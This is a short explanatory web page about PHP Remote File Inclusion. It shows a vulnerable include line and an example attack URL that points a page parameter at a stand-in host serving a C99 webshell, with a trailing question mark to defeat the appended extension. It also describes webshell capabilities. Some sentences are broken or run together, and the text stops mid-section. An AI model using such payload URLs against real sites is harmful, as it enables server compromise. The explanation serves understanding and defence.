15.46.59 RFI vulnerable | |
How the attack worksRemote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this: include($page . '.php'); This line of PHP code, is then used in URLs like the following example: http://www.vulnerable.example.org/index.php?page=archive Because the http://www.vulnerable.example.org/index.php?page=http://www.malicious.example.com/C99.php? The http://www.malicious.example.com/C99.php.php As the attackers cannot know what the original code might append, they put a question mark at the end of the URLs. This makes the script fetch the intended file, with the appended string as a parameter (which is ignored by the attackers script): http://www.malicious.example.com/C99.php?.php This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Scripts that send Spam are also very common. Potentially, the attacker could even use the webshell to gain administrator-level, or root, access on the server. Why the attack worksRFI attacks are possible because of several PHP configuration flags:
| |
|
Total comments: 0 | |